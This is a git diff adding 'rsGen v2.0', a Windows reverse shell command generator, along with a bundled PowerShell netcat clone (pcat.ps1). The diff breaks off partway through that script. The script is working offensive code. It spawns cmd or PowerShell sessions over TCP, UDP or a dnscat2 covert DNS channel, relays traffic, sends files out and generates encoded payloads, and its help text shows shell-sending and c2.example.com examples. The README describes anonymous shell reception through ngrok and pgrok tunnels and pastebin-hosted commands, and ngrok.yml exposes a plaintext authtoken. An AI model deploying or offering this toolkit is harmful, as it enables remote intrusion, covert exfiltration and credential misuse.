diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..8ad8b13 --- /dev/null +++ b/.gitattributes @@ -0,0 +1,29 @@ +* linguist-vendored +*.bat linguist-language=Flyfish +# In general, use LF for text +* text eol=crlf + +# Windows CMD does not like LF in batch files +*.bat text eol=crlf +*.cmd text eol=crlf + +# Visual Studio solutions like to switch to CRLF at times +*.sln text eol=crlf + +*.ai binary +*.aiff binary +*.dll binary +*.eot binary +*.exe binary +*.jar binary +*.jpg binary +*.gif binary +*.mp3 binary +*.o binary +*.pdf binary +*.png binary +*.psd binary +*.so binary +*.ttf binary +*.winmd binary +*.zip binary \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..7f224c4 --- /dev/null +++ b/README.md @@ -0,0 +1,41 @@ + + rsGen v2.0 - Reverse Shell Command Genrator. + = + + rsGen is an automated reverse shell command genrator, built by Windows Batch and Jscript. The main functions include native command generation and variant command generation. In version 2.0, I added an anonymous reverse shell receiving function "-ngrok" and "-pgrok". + +![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/doc/rsgen.png "rsGen") + +## Usage + + +``` + +-pub Generate a "variant command".Use this parameter,the Command will be encoded upload to the + public pastebin website. + +-lan In some cases, the target machine cannot request an external network.This parameter will call + mongoose.exe in the command directory(a mini web server, only 144kb, see the website: + https://cesanta.com/), enable a web service on the local port 80 for command request execution. + After the end, you need to manually exit it. + +-listen Start port listening locally to receive shell that bounce back.Start port listening locally + to receive a shell that bounces back, Function equivalent to the netcat (call powercat.ps1). + +-ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options).Notice:I added a ngrok authtoken. Since + it is a free plan, it may not be available to multiple people. You can go to ngrok.com to apply + for your own authtoken, and then modify your authtoken in the include/config.yaml file + +-pgrok Start pgrok TCP Tunnel(Contains -pub, -listen options).like ngrok but free and unlimited. + +``` +![rsGen](https://raw.githubusercontent.com/FlyfishSec/rsGen/master/doc/rsgen-pgrok.png "rsGen-pgrok") + + +## Operating system + + A Windows 7 or higher Windows operating system. + + + + diff --git a/doc/rsgen-pgrok.png b/doc/rsgen-pgrok.png new file mode 100644 index 0000000..cb2eb9f Binary files /dev/null and b/doc/rsgen-pgrok.png differ diff --git a/doc/rsgen.png b/doc/rsgen.png new file mode 100644 index 0000000..0851111 Binary files /dev/null and b/doc/rsgen.png differ diff --git a/include/curl.exe b/include/curl.exe new file mode 100644 index 0000000..64ac0b2 Binary files /dev/null and b/include/curl.exe differ diff --git a/include/mongoose.exe b/include/mongoose.exe new file mode 100644 index 0000000..dbda1a3 Binary files /dev/null and b/include/mongoose.exe differ diff --git a/include/ngrok.exe b/include/ngrok.exe new file mode 100644 index 0000000..3c9e9e6 Binary files /dev/null and b/include/ngrok.exe differ diff --git a/include/ngrok.yml b/include/ngrok.yml new file mode 100644 index 0000000..d849fa4 --- /dev/null +++ b/include/ngrok.yml @@ -0,0 +1 @@ +authtoken: 1pqNPomgd8IS4MEVD5ixWqbynci_7qPUV8PQ9bZhDhR23gvBq diff --git a/include/pcat.ps1 b/include/pcat.ps1 new file mode 100644 index 0000000..2693996 --- /dev/null +++ b/include/pcat.ps1 @@ -0,0 +1,948 @@ +function pcat +{ + param( + [alias("Client")][string]$c="", + [alias("Listen")][switch]$l=$False, + [alias("Port")][Parameter(Position=-1)][string]$p="", + [alias("Execute")][string]$e="", + [alias("ExecutePowershell")][switch]$ep=$False, + [alias("Relay")][string]$r="", + [alias("UDP")][switch]$u=$False, + [alias("dnscat2")][string]$dns="", + [alias("DNSFailureThreshold")][int32]$dnsft=10, + [alias("Timeout")][int32]$t=60, + [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null, + [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host", + [alias("OutputFile")][string]$of="", + [alias("Disconnect")][switch]$d=$False, + [alias("Repeater")][switch]$rep=$False, + [alias("GeneratePayload")][switch]$g=$False, + [alias("GenerateEncoded")][switch]$ge=$False, + [alias("Help")][switch]$h=$False + ) + + ############### HELP ############### + $Help = " +pcat - Netcat, The Powershell Version +Github Repository: https://github.com/besimorhino/pcat + +This script attempts to implement the features of netcat in a powershell +script. It also contains extra features such as built-in relays, execute +powershell, and a dnscat2 client. + +Usage: pcat [-c or -l] [-p port] [options] + + -c Client Mode. Provide the IP of the system you wish to connect to. + If you are using -dns, specify the DNS Server to send queries to. + + -l Listen Mode. Start a listener on the port specified by -p. + + -p Port. The port to connect to, or the port to listen on. + + -e Execute. Specify the name of the process to start. + + -ep Execute Powershell. Start a pseudo powershell session. You can + declare variables and execute commands, but if you try to enter + another shell (nslookup, netsh, cmd, etc.) the shell will hang. + + -r Relay. Used for relaying network traffic between two nodes. + Client Relay Format: -r :: + Listener Relay Format: -r : + DNSCat2 Relay Format: -r dns::: + + -u UDP Mode. Send traffic over UDP. Because it's UDP, the client + must send data before the server can respond. + + -dns DNS Mode. Send traffic over the dnscat2 dns covert channel. + Specify the dns server to -c, the dns port to -p, and specify the + domain to this option, -dns. This is only a client. + Get the server here: https://github.com/iagox86/dnscat2 + + -dnsft DNS Failure Threshold. This is how many bad packets the client can + recieve before exiting. Set to zero when receiving files, and set high + for more stability over the internet. + + -t Timeout. The number of seconds to wait before giving up on listening or + connecting. Default: 60 + + -i Input. Provide data to be sent down the pipe as soon as a connection is + established. Used for moving files. You can provide the path to a file, + a byte array object, or a string. You can also pipe any of those into + pcat, like 'aaaaaa' | pcat -c 10.1.1.1 -p 80 + + -o Output. Specify how pcat should return information to the console. + Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'. + + -of Output File. Specify the path to a file to write output to. + + -d Disconnect. pcat will disconnect after the connection is established + and the input from -i is sent. Used for scanning. + + -rep Repeater. pcat will continually restart after it is disconnected. + Used for setting up a persistent server. + + -g Generate Payload. Returns a script as a string which will execute the + pcat with the options you have specified. -i, -d, and -rep will not + be incorporated. + + -ge Generate Encoded Payload. Does the same as -g, but returns a string which + can be executed in this way: powershell -E + + -h Print this help message. + +Examples: + + Listen on port 8000 and print the output to the console. + pcat -l -p 8000 + + Connect to 10.1.1.1 port 443, send a shell, and enable verbosity. + pcat -c 10.1.1.1 -p 443 -e cmd -v + + Connect to the dnscat2 server on c2.example.com, and send dns queries + to the dns server on 10.1.1.1 port 53. + pcat -c 10.1.1.1 -p 53 -dns c2.example.com + + Send a file to 10.1.1.15 port 8000. + pcat -c 10.1.1.15 -p 8000 -i C:\inputfile + + Write the data sent to the local listener on port 4444 to C:\outfile + pcat -l -p 4444 -of C:\outfile + + Listen on port 8000 and repeatedly server a powershell shell. + pcat -l -p 8000 -ep -rep + + Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp. + pcat -l -p 8000 -r tcp:10.1.1.1:9000 + + Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com, + sending queries to 10.1.1.1 port 53. + pcat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com +" + if($h){return $Help} + ############### HELP ############### + + ############### VALIDATE ARGS ############### + $global:Verbose = $Verbose + if($of -ne ''){$o = 'Bytes'} + if($dns -eq "") + { + if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."} + if($p -eq ""){return "Please provide a port number to -p."} + } + if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"} + if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."} + if($l) + { + $Failure = $False + netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}} + if($Failure){break} + } + if($r -ne "") + { + if($r.split(":").Count -eq 2) + { + $Failure = $False + netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}} + if($Failure){break} + } + } + ############### VALIDATE ARGS ############### + + ############### UDP FUNCTIONS ############### + function Setup_UDP + { + param($FuncSetupVars) + if($global:Verbose){$Verbose = $True} + $c,$l,$p,$t = $FuncSetupVars + $FuncVars = @{} + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + if($l) + { + $SocketDestinationBuffer = New-Object System.Byte[] 65536 + $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p + $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p + $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation + Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]") + $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null) + $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + while($True) + { + if($Host.UI.RawUI.KeyAvailable) + { + if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode)) + { + Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..." + $FuncVars["Socket"].Close() + $Stopwatch.Stop() + break + } + } + if($Stopwatch.Elapsed.TotalSeconds -gt $t) + { + $FuncVars["Socket"].Close() + $Stopwatch.Stop() + Write-Verbose "Timeout!" ; break + } + if($ConnectHandle.IsCompleted) + { + $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo) + Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")") + if($SocketBytesRead -gt 0){break} + else{break} + } + } + $Stopwatch.Stop() + $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)] + } + else + { + if(!$c.Contains(".")) + { + $IPList = @() + [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString} + Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0]) + $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p + } + else + { + $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p + } + $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient + $FuncVars["Socket"].Connect($c,$p) + Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...") + Write-Verbose ("UDP: Make sure to send some data so the server can notice you!") + } + $FuncVars["BufferSize"] = 65536 + $FuncVars["EndPoint"] = $EndPoint + $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"] + $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null) + return $FuncVars + } + function ReadData_UDP + { + param($FuncVars) + $Data = $null + if($FuncVars["StreamReadOperation"].IsCompleted) + { + $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"]) + if($StreamBytesRead -eq 0){break} + $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)] + $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null) + } + return $Data,$FuncVars + } + function WriteData_UDP + { + param($Data,$FuncVars) + $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null + return $FuncVars + } + function Close_UDP + { + param($FuncVars) + $FuncVars["Socket"].Close() + } + ############### UDP FUNCTIONS ############### + + ############### DNS FUNCTIONS ############### + function Setup_DNS + { + param($FuncSetupVars) + if($global:Verbose){$Verbose = $True} + function ConvertTo-HexArray + { + param($String) + $Hex = @() + $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_} + return $Hex + } + + function SendPacket + { + param($Packet,$DNSServer,$DNSPort) + $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit") + $result = ($Command | nslookup 2>&1 | Out-String) + if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)} + else{return 1} + } + + function Create_SYN + { + param($SessionId,$SeqNum,$Tag,$Domain) + return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain) + } + + function Create_FIN + { + param($SessionId,$Tag,$Domain) + return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain) + } + + function Create_MSG + { + param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain) + return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain) + } + + function DecodePacket + { + param($Packet) + + if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1} + $AcknowledgementNumber = ($Packet[10..13] -join "") + $SeqNum = ($Packet[14..17] -join "") + [byte[]]$ReturningData = @() + + if($Packet.Length -gt 18) + { + $PacketElim = $Packet.Substring(18) + while($PacketElim.Length -gt 0) + { + $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16) + $PacketElim = $PacketElim.Substring(2) + } + } + + return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum + } + + function AcknowledgeData + { + param($ReturningData,$AcknowledgementNumber) + $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535)) + if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)} + return $Hex + } + $FuncVars = @{} + $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars + if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"} + $FuncVars["Tag"] = "" + $FuncVars["Domain"] = ("." + $FuncVars["Domain"]) + + $FuncVars["Create_SYN"] = ${function:Create_SYN} + $FuncVars["Create_MSG"] = ${function:Create_MSG} + $FuncVars["Create_FIN"] = ${function:Create_FIN} + $FuncVars["DecodePacket"] = ${function:DecodePacket} + $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray} + $FuncVars["AckData"] = ${function:AcknowledgeData} + $FuncVars["SendPacket"] = ${function:SendPacket} + $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000)) + $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000)) + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + $FuncVars["Failures"] = 0 + + $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"])) + $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"])) + $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket)) + if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."} + $ReturningData = $DecodedPacket[1] + if($ReturningData -ne ""){$FuncVars["InputData"] = ""} + $FuncVars["AckNum"] = $DecodedPacket[2] + $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length) + if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."} + return $FuncVars + } + function ReadData_DNS + { + param($FuncVars) + if($global:Verbose){$Verbose = $True} + + $PacketsData = @() + $PacketData = "" + + if($FuncVars["InputData"] -ne $null) + { + $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"])) + $SectionCount = 0 + $PacketCount = 0 + foreach($Char in $Hex) + { + if($SectionCount -ge 30) + { + $SectionCount = 0 + $PacketData += "." + } + if($PacketCount -ge ($FuncVars["MaxMSGDataSize"])) + { + $PacketsData += $PacketData.TrimEnd(".") + $PacketCount = 0 + $SectionCount = 0 + $PacketData = "" + } + $PacketData += $Char + $SectionCount += 2 + $PacketCount += 2 + } + $PacketData = $PacketData.TrimEnd(".") + $PacketsData += $PacketData + $FuncVars["InputData"] = "" + } + else + { + $PacketsData = @("") + } + + [byte[]]$ReturningData = @() + foreach($PacketData in $PacketsData) + { + try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])} + catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue } + try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))} + catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue } + try + { + $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet)) + if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue } + $FuncVars["AckNum"] = $DecodedPacket[2] + $FuncVars["SeqNum"] = $DecodedPacket[3] + $ReturningData += $DecodedPacket[1] + } + catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue } + if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue } + } + + if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break} + + if($ReturningData -ne @()) + { + $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"])) + } + return $ReturningData,$FuncVars + } + function WriteData_DNS + { + param($Data,$FuncVars) + $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data) + return $FuncVars + } + function Close_DNS + { + param($FuncVars) + $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"]) + Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null + } + ############### DNS FUNCTIONS ############### + + ########## TCP FUNCTIONS ########## + function Setup_TCP + { + param($FuncSetupVars) + $c,$l,$p,$t = $FuncSetupVars + if($global:Verbose){$Verbose = $True} + $FuncVars = @{} + if(!$l) + { + $FuncVars["l"] = $False + $Socket = New-Object System.Net.Sockets.TcpClient + Write-Verbose "Connecting..." + $Handle = $Socket.BeginConnect($c,$p,$null,$null) + } + else + { + $FuncVars["l"] = $True + Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")") + $Socket = New-Object System.Net.Sockets.TcpListener $p + $Socket.Start() + $Handle = $Socket.BeginAcceptTcpClient($null, $null) + } + + $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + while($True) + { + if($Host.UI.RawUI.KeyAvailable) + { + if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode)) + { + Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..." + if($FuncVars["l"]){$Socket.Stop()} + else{$Socket.Close()} + $Stopwatch.Stop() + break + } + } + if($Stopwatch.Elapsed.TotalSeconds -gt $t) + { + if(!$l){$Socket.Close()} + else{$Socket.Stop()} + $Stopwatch.Stop() + Write-Verbose "Timeout!" ; break + break + } + if($Handle.IsCompleted) + { + if(!$l) + { + try + { + $Socket.EndConnect($Handle) + $Stream = $Socket.GetStream() + $BufferSize = $Socket.ReceiveBufferSize + Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!") + } + catch{$Socket.Close(); $Stopwatch.Stop(); break} + } + else + { + $Client = $Socket.EndAcceptTcpClient($Handle) + $Stream = $Client.GetStream() + $BufferSize = $Client.ReceiveBufferSize + Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")") + } + break + } + } + $Stopwatch.Stop() + if($Socket -eq $null){break} + $FuncVars["Stream"] = $Stream + $FuncVars["Socket"] = $Socket + $FuncVars["BufferSize"] = $BufferSize + $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"]) + $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null) + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + $FuncVars["StreamBytesRead"] = 1 + return $FuncVars + } + function ReadData_TCP + { + param($FuncVars) + $Data = $null + if($FuncVars["StreamBytesRead"] -eq 0){break} + if($FuncVars["StreamReadOperation"].IsCompleted) + { + $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"]) + if($StreamBytesRead -eq 0){break} + $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)] + $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null) + } + return $Data,$FuncVars + } + function WriteData_TCP + { + param($Data,$FuncVars) + $FuncVars["Stream"].Write($Data, 0, $Data.Length) + return $FuncVars + } + function Close_TCP + { + param($FuncVars) + try{$FuncVars["Stream"].Close()} + catch{} + if($FuncVars["l"]){$FuncVars["Socket"].Stop()} + else{$FuncVars["Socket"].Close()} + } + ########## TCP FUNCTIONS ########## + + ########## CMD FUNCTIONS ########## + function Setup_CMD + { + param($FuncSetupVars) + if($global:Verbose){$Verbose = $True} + $FuncVars = @{} + $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo + $ProcessStartInfo.FileName = $FuncSetupVars[0] + $ProcessStartInfo.UseShellExecute = $False + $ProcessStartInfo.RedirectStandardInput = $True + $ProcessStartInfo.RedirectStandardOutput = $True + $ProcessStartInfo.RedirectStandardError = $True + $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo) + Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...") + $FuncVars["Process"].Start() | Out-Null + $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536 + $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null) + $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536 + $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null) + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + return $FuncVars + } + function ReadData_CMD + { + param($FuncVars) + [byte[]]$Data = @() + if($FuncVars["StdOutReadOperation"].IsCompleted) + { + $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"]) + if($StdOutBytesRead -eq 0){break} + $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)] + $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null) + } + if($FuncVars["StdErrReadOperation"].IsCompleted) + { + $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"]) + if($StdErrBytesRead -eq 0){break} + $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)] + $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null) + } + return $Data,$FuncVars + } + function WriteData_CMD + { + param($Data,$FuncVars) + $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n")) + return $FuncVars + } + function Close_CMD + { + param($FuncVars) + $FuncVars["Process"] | Stop-Process + } + ########## CMD FUNCTIONS ########## + + ########## POWERSHELL FUNCTIONS ########## + function Main_Powershell + { + param($Stream1SetupVars) + try + { + $encoding = New-Object System.Text.AsciiEncoding + [byte[]]$InputToWrite = @() + if($i -ne $null) + { + Write-Verbose "Input from -i detected..." + if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) } + elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i } + elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) } + else{Write-Host "Unrecognised input type." ; return} + } + + Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)" + try{$Stream1Vars = Stream1_Setup $Stream1SetupVars} + catch{Write-Verbose "Stream 1 Setup Failure" ; return} + + Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)" + try + { + $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> ")) + $Prompt = ("PS " + (pwd).Path + "> ") + $CommandToExecute = "" + $Data = $null + } + catch + { + Write-Verbose "Stream 2 Setup Failure" ; return + } + + if($InputToWrite -ne @()) + { + Write-Verbose "Writing input to Stream 1..." + try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars} + catch{Write-Host "Failed to write input to Stream 1" ; return} + } + + if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return} + + Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..." + while($True) + { + try + { + ##### Stream2 Read ##### + $Prompt = $null + $ReturnedData = $null + if($CommandToExecute -ne "") + { + try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))} + catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))} + $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> ")) + } + $Data += $IntroPrompt + $IntroPrompt = $null + $Data += $ReturnedData + $Data += $Prompt + $CommandToExecute = "" + ##### Stream2 Read ##### + + if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return + } + + try + { + $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars + if($Data.Length -eq 0){Start-Sleep -Milliseconds 100} + if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return + } + } + } + finally + { + try + { + Write-Verbose "Closing Stream 1..." + Stream1_Close $Stream1Vars + } + catch + { + Write-Verbose "Failed to close Stream 1" + } + } + } + ########## POWERSHELL FUNCTIONS ########## + + ########## CONSOLE FUNCTIONS ########## + function Setup_Console + { + param($FuncSetupVars) + $FuncVars = @{} + $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding + $FuncVars["Output"] = $FuncSetupVars[0] + $FuncVars["OutputBytes"] = [byte[]]@() + $FuncVars["OutputString"] = "" + return $FuncVars + } + function ReadData_Console + { + param($FuncVars) + $Data = $null + if($Host.UI.RawUI.KeyAvailable) + { + $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n") + } + return $Data,$FuncVars + } + function WriteData_Console + { + param($Data,$FuncVars) + switch($FuncVars["Output"]) + { + "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)} + "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)} + "Bytes" {$FuncVars["OutputBytes"] += $Data} + } + return $FuncVars + } + function Close_Console + { + param($FuncVars) + if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]} + elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]} + return + } + ########## CONSOLE FUNCTIONS ########## + + ########## MAIN FUNCTION ########## + function Main + { + param($Stream1SetupVars,$Stream2SetupVars) + try + { + [byte[]]$InputToWrite = @() + $Encoding = New-Object System.Text.AsciiEncoding + if($i -ne $null) + { + Write-Verbose "Input from -i detected..." + if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) } + elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i } + elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) } + else{Write-Host "Unrecognised input type." ; return} + } + + Write-Verbose "Setting up Stream 1..." + try{$Stream1Vars = Stream1_Setup $Stream1SetupVars} + catch{Write-Verbose "Stream 1 Setup Failure" ; return} + + Write-Verbose "Setting up Stream 2..." + try{$Stream2Vars = Stream2_Setup $Stream2SetupVars} + catch{Write-Verbose "Stream 2 Setup Failure" ; return} + + $Data = $null + + if($InputToWrite -ne @()) + { 